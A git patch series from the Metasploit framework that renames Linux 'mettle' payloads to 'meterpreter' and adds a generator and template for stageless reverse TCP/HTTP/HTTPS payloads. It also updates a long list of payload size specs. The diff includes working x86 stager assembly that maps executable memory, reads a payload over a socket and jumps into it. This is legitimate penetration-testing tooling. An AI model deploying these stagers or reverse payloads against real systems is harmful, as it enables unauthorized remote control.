elf2bin(payload) - # XXX, not working. Use .c version - - # This code acts as a mini elf parser / memory layout linker. - # It will return what a elf file looks like once loaded in memory - - mem = "\x00" * (4 * 1024 * 1024) - used = 0 - - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - - elf.program_header.each { |hdr| - if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD) - print_status("Found PT_LOAD") - fileidx = hdr.p_offset & (~4095) - memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr - len = hdr.p_filesz + (hdr.p_vaddr & 4095) - - mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D - used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095 - end - } - - # Maybe at some stage zero out elf header / program headers in case tools - # try to look for them - - print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes") - return mem[0, used] - end -=end - def handle_intermediate_stage(conn, payload) entry_offset = elf_ep(payload) - config_offset = payload.length - generate_meterpreter.length - encoded_entry = "0x%.8x" % entry_offset - encoded_offset = "0x%.8x" % config_offset - encoded_debug_options = "0x%.2x" % datastore['DebugOptions'].to_i + midstager_asm = %( + push edi ; save sockfd + xor ebx, ebx ; address + mov ecx, #{payload.length} ; length + mov edx, 7 ; PROT_READ | PROT_WRITE | PROT_EXECUTE + mov esi, 34 ; MAP_PRIVATE | MAP_ANONYMOUS + xor edi, edi ; fd + xor ebp, ebp ; pgoffset + mov eax, 192 ; mmap2 + int 0x80 ; syscall - # Maybe in the future patch in base. + ; receive mettle process image + mov edx, eax ; save buf addr for next code block + pop ebx ; sockfd + push 0x00000100 ; MSG_WAITALL + push #{payload.length} ; size + push eax ; buf + push ebx ; sockfd + mov ecx, esp ; arg array + mov ebx, 10 ; SYS_READ + mov eax, 102 ; sys_socketcall + int 0x80 ; syscall - # Does a mmap() / read() loop of a user specified length, then - # jumps to the entry point (the \x5a's) - midstager_asm = %Q^ - midstager: - and esp, 0xFFFFF254 - push 0x4 - pop edx - mov ecx, esp - mov ebx, edi - push 0x3 - pop eax - int 0x80 - push edi - mov eax, 0xC0 - mov ebx, 0x20040000 - mov ecx, dword ptr [esp+0x4] - push 0x7 - pop edx - push 0x32 - pop esi - xor edi, edi - mov ebp, edi - dec edi - int 0x80 - cmp eax, 0xFFFFFF7F - jb start_read - terminate: - xor eax, eax - inc eax - int 0x80 ; sys_exit - start_read: - xchg ecx, edx - xchg ecx, ebx - pop ebx - read_loop: - push 0x3 - pop eax - int 0x80 ; sys_read - cmp eax, 0xFFFFFF7F - ja terminate ; exit on error - test eax, eax - je terminate ; exit on error - add ecx, eax - sub edx, eax - jne read_loop ; read more - ; edx should be at the end, but we need to adjust for the size of the config - ; block so we know where to write the socket to memory - sub ecx, #{encoded_offset} - mov [ecx], ebx ; write the socket to the config - push #{encoded_debug_options} - push ecx ; pass in the configuration pointer - mov eax, #{encoded_entry} ; put the entry point in eax - call eax - jmp terminate - ^ + ; setup stack + pop edi + xor ebx, ebx + and esp, 0xfffffff0 ; align esp + add esp, 40 + mov eax, 109 + push eax + mov esi, esp + push ebx ; NULL + push ebx ; AT_NULL + push edx ; mmap buffer + mov eax, 7 + push eax ; AT_BASE + push ebx ; end of ENV + push ebx ; NULL + push edi ; sockfd + push esi ; m + mov eax, 2 + push eax ; argc + + ; down the rabbit hole + mov eax, #{entry_offset} + add edx, eax + jmp edx + ) midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string - - print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") - conn.put(midstager) - Rex::ThreadSafe.sleep(1.5) - - # Send length of payload - conn.put([ payload.length ].pack('V')) - return true - + vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") + conn.put(midstager) == midstager.length end - def generate_stage(opts={}) - meterpreter = generate_meterpreter - config = generate_config(opts) - meterpreter + config - end - - def generate_meterpreter - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - def generate_config(opts={}) - opts[:uuid] ||= generate_payload_uuid - ds = opts[:datastore] || datastore - - # create the configuration block, which for staged connections is really simple. - config_opts = { - arch: opts[:uuid].arch, - exitfunk: nil, - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - ascii_str: true - } - - # create the configuration instance based off the parameters - config = Rex::Payloads::Meterpreter::Config.new(config_opts) - - # return the binary version of it - config.to_b + def generate_stage(opts = {}) + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :process_image end end diff --git a/modules/payloads/stages/linux/x86/mettle.rb b/modules/payloads/stages/linux/x86/mettle.rb deleted file mode 100644 index f410e33bca..0000000000 --- a/modules/payloads/stages/linux/x86/mettle.rb +++ /dev/null @@ -1,98 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'msf/base/sessions/meterpreter_x86_mettle_linux' -require 'msf/base/sessions/meterpreter_options' -require 'msf/base/sessions/mettle_config' -require 'rex/elfparsey' - -module MetasploitModule - include Msf::Sessions::MeterpreterOptions - include Msf::Sessions::MettleConfig - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'Linux Mettle x86', - 'Description' => 'Inject the mettle server payload (staged)', - 'Author' => [ - 'William Webb ' - ], - 'Platform' => 'Linux', - 'Arch' => ARCH_X86, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_x86_Mettle_Linux - ) - ) - end - - def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) - elf.elf_header.e_entry - end - - def handle_intermediate_stage(conn, payload) - entry_offset = elf_ep(payload) - - midstager_asm = %( - push edi ; save sockfd - xor ebx, ebx ; address - mov ecx, #{payload.length} ; length - mov edx, 7 ; PROT_READ | PROT_WRITE | PROT_EXECUTE - mov esi, 34 ; MAP_PRIVATE | MAP_ANONYMOUS - xor edi, edi ; fd - xor ebp, ebp ; pgoffset - mov eax, 192 ; mmap2 - int 0x80 ; syscall - - ; receive mettle process image - mov edx, eax ; save buf addr for next code block - pop ebx ; sockfd - push 0x00000100 ; MSG_WAITALL - push #{payload.length} ; size - push eax ; buf - push ebx ; sockfd - mov ecx, esp ; arg array - mov ebx, 10 ; SYS_READ - mov eax, 102 ; sys_socketcall - int 0x80 ; syscall - - ; setup stack - pop edi - xor ebx, ebx - and esp, 0xfffffff0 ; align esp - add esp, 40 - mov eax, 109 - push eax - mov esi, esp - push ebx ; NULL - push ebx ; AT_NULL - push edx ; mmap buffer - mov eax, 7 - push eax ; AT_BASE - push ebx ; end of ENV - push ebx ; NULL - push edi ; sockfd - push esi ; m - mov eax, 2 - push eax ; argc - - ; down the rabbit hole - mov eax, #{entry_offset} - add edx, eax - jmp edx - ) - - midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string - vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") - conn.put(midstager) == midstager.length - end - - def generate_stage(opts = {}) - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :process_image - end -end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb new file mode 100755 index 0000000000..91d8bbb520 --- /dev/null +++ b/tools/modules/generate_mettle_payloads.rb @@ -0,0 +1,45 @@ +#!/usr/bin/env ruby +# +# This script generates Mettle payload wrappers +# + +require 'erb' + +schemes = [ + 'tcp', + 'http', + 'https' +] + +arches = [ + ['aarch64', 'aarch64-linux-musl'], + ['armbe', 'armv5b-linux-musleabi'], + ['armle', 'armv5l-linux-musleabi'], + ['mips64', 'mips64-linux-muslsf'], + ['mipsbe', 'mips-linux-muslsf'], + ['mipsle', 'mipsel-linux-muslsf'], + ['ppc', 'powerpc-linux-muslsf'], + ['ppc64le', 'powerpc64le-linux-musl'], + ['x64', 'x86_64-linux-musl'], + ['x86', 'i486-linux-musl'], + ['zarch', 's390x-linux-musl'], +] + +arch = '' +payload = '' +scheme = '' +cwd = File::dirname(__FILE__) +template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb')) +renderer = ERB.new(template) + +arches.each do |a, p| + schemes.each do |s| + arch = a + payload = p + scheme = s + filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb") + File::write(filename, renderer.result()) + end +end + +`bundle exec #{File::join(cwd, 'update_payload_cached_sizes.rb')}` diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/linux_meterpreter_reverse.erb new file mode 100644 index 0000000000..bffd3a8edb --- /dev/null +++ b/tools/modules/linux_meterpreter_reverse.erb @@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_<%= scheme %>' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_<%= arch %>_linux' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_<%= arch.upcase %>, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>, + 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux + ) + ) + end + + def generate + opts = {scheme: '<%= scheme %>'} + MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec + end +end From a191e122419f80c5c118381f3f0531c9c991be7e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sat, 22 Apr 2017 15:00:49 -0500 Subject: [PATCH 2/7] update specs --- spec/modules/payloads_spec.rb | 532 ++++++++++++++++++++-------------- 1 file changed, 321 insertions(+), 211 deletions(-) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 660bb2d19f..82df67ca02 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1430,136 +1430,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/exec' end - context 'linux/x86/meterpreter/bind_ipv6_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_ipv6_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp' - end - - context 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_ipv6_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' - end - - context 'linux/x86/meterpreter/bind_nonx_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_nonx_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_nonx_tcp' - end - - context 'linux/x86/meterpreter/bind_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_tcp' - end - - context 'linux/x86/meterpreter/bind_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_tcp_uuid' - end - - context 'linux/x86/meterpreter/find_tag' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/find_tag', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/find_tag' - end - - context 'linux/x86/meterpreter/reverse_ipv6_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_ipv6_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_ipv6_tcp' - end - - context 'linux/x86/meterpreter/reverse_nonx_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_nonx_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_nonx_tcp' - end - - context 'linux/x86/meterpreter/reverse_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_tcp' - end - - context 'linux/x86/meterpreter/reverse_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_tcp_uuid' - end - - context 'linux/x86/metsvc_bind_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/metsvc_bind_tcp' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/metsvc_bind_tcp' - end - - context 'linux/x86/metsvc_reverse_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/metsvc_reverse_tcp' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/metsvc_reverse_tcp' - end - context 'linux/x86/read_file' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4290,290 +4160,530 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_winhttps' end - context 'linux/aarch64/mettle_reverse_tcp' do + context 'linux/aarch64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/aarch64/mettle_reverse_tcp' + 'singles/linux/aarch64/meterpreter_reverse_http' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/mettle_reverse_tcp' + reference_name: 'linux/aarch64/meterpreter_reverse_http' end - context 'linux/armbe/mettle_reverse_tcp' do + context 'linux/aarch64/meterpreter_reverse_https' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/armbe/mettle_reverse_tcp' + 'singles/linux/aarch64/meterpreter_reverse_https' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armbe/mettle_reverse_tcp' + reference_name: 'linux/aarch64/meterpreter_reverse_https' end - context 'linux/armle/mettle/bind_tcp' do + context 'linux/armbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_http' + end + + context 'linux/armbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_https' + end + + context 'linux/armle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_http' + end + + context 'linux/armle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_https' + end + + context 'linux/mips64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mips64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mips64/meterpreter_reverse_http' + end + + context 'linux/mips64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mips64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mips64/meterpreter_reverse_https' + end + + context 'linux/mipsbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsbe/meterpreter_reverse_http' + end + + context 'linux/mipsbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsbe/meterpreter_reverse_https' + end + + context 'linux/mipsle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsle/meterpreter_reverse_http' + end + + context 'linux/mipsle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsle/meterpreter_reverse_https' + end + + context 'linux/ppc/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc/meterpreter_reverse_http' + end + + context 'linux/ppc/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc/meterpreter_reverse_https' + end + + context 'linux/ppc64le/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc64le/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc64le/meterpreter_reverse_http' + end + + context 'linux/ppc64le/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc64le/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc64le/meterpreter_reverse_https' + end + + context 'linux/x64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x64/meterpreter_reverse_http' + end + + context 'linux/x64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x64/meterpreter_reverse_https' + end + + context 'linux/x86/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/meterpreter_reverse_http' + end + + context 'linux/x86/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/meterpreter_reverse_https' + end + + context 'linux/x86/metsvc_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/metsvc_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/metsvc_bind_tcp' + end + + context 'linux/x86/metsvc_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/metsvc_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/metsvc_reverse_tcp' + end + + context 'linux/zarch/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/zarch/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/zarch/meterpreter_reverse_http' + end + + context 'linux/zarch/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/zarch/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/zarch/meterpreter_reverse_https' + end + + context 'linux/aarch64/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_tcp' + end + + context 'linux/armbe/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_tcp' + end + + context 'linux/armle/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/armle/bind_tcp', - 'stages/linux/armle/mettle' + 'stages/linux/armle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle/bind_tcp' + reference_name: 'linux/armle/meterpreter/bind_tcp' end - context 'linux/armle/mettle/reverse_tcp' do + context 'linux/armle/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/armle/reverse_tcp', - 'stages/linux/armle/mettle' + 'stages/linux/armle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle/reverse_tcp' + reference_name: 'linux/armle/meterpreter/reverse_tcp' end - context 'linux/armle/mettle_reverse_tcp' do + context 'linux/armle/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/armle/mettle_reverse_tcp' + 'singles/linux/armle/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle_reverse_tcp' + reference_name: 'linux/armle/meterpreter_reverse_tcp' end - context 'linux/mips64/mettle_reverse_tcp' do + context 'linux/mips64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mips64/mettle_reverse_tcp' + 'singles/linux/mips64/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mips64/mettle_reverse_tcp' + reference_name: 'linux/mips64/meterpreter_reverse_tcp' end - context 'linux/mipsbe/mettle/reverse_tcp' do + context 'linux/mipsbe/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/mipsbe/reverse_tcp', - 'stages/linux/mipsbe/mettle' + 'stages/linux/mipsbe/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsbe/mettle/reverse_tcp' + reference_name: 'linux/mipsbe/meterpreter/reverse_tcp' end - context 'linux/mipsbe/mettle_reverse_tcp' do + context 'linux/mipsbe/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mipsbe/mettle_reverse_tcp' + 'singles/linux/mipsbe/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsbe/mettle_reverse_tcp' + reference_name: 'linux/mipsbe/meterpreter_reverse_tcp' end - context 'linux/mipsle/mettle/reverse_tcp' do + context 'linux/mipsle/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/mipsle/reverse_tcp', - 'stages/linux/mipsle/mettle' + 'stages/linux/mipsle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsle/mettle/reverse_tcp' + reference_name: 'linux/mipsle/meterpreter/reverse_tcp' end - context 'linux/mipsle/mettle_reverse_tcp' do + context 'linux/mipsle/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/mipsle/mettle_reverse_tcp' + 'singles/linux/mipsle/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/mipsle/mettle_reverse_tcp' + reference_name: 'linux/mipsle/meterpreter_reverse_tcp' end - context 'linux/ppc/mettle_reverse_tcp' do + context 'linux/ppc/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/ppc/mettle_reverse_tcp' + 'singles/linux/ppc/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/ppc/mettle_reverse_tcp' + reference_name: 'linux/ppc/meterpreter_reverse_tcp' end - context 'linux/ppc64le/mettle_reverse_tcp' do + context 'linux/ppc64le/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/ppc64le/mettle_reverse_tcp' + 'singles/linux/ppc64le/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/ppc64le/mettle_reverse_tcp' + reference_name: 'linux/ppc64le/meterpreter_reverse_tcp' end - context 'linux/x64/mettle/bind_tcp' do + context 'linux/x64/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x64/bind_tcp', - 'stages/linux/x64/mettle' + 'stages/linux/x64/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle/bind_tcp' + reference_name: 'linux/x64/meterpreter/bind_tcp' end - context 'linux/x64/mettle/reverse_tcp' do + context 'linux/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x64/reverse_tcp', - 'stages/linux/x64/mettle' + 'stages/linux/x64/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle/reverse_tcp' + reference_name: 'linux/x64/meterpreter/reverse_tcp' end - context 'linux/x64/mettle_reverse_tcp' do + context 'linux/x64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/x64/mettle_reverse_tcp' + 'singles/linux/x64/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x64/mettle_reverse_tcp' + reference_name: 'linux/x64/meterpreter_reverse_tcp' end - context 'linux/x86/mettle/bind_ipv6_tcp' do + context 'linux/x86/meterpreter/bind_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_ipv6_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_ipv6_tcp' + reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp' end - context 'linux/x86/mettle/bind_ipv6_tcp_uuid' do + context 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_ipv6_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_ipv6_tcp_uuid' + reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' end - context 'linux/x86/mettle/bind_nonx_tcp' do + context 'linux/x86/meterpreter/bind_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_nonx_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_nonx_tcp' + reference_name: 'linux/x86/meterpreter/bind_nonx_tcp' end - context 'linux/x86/mettle/bind_tcp' do + context 'linux/x86/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/bind_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_tcp' + reference_name: 'linux/x86/meterpreter/bind_tcp' end - context 'linux/x86/mettle/bind_tcp_uuid' do + context 'linux/x86/meterpreter/bind_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 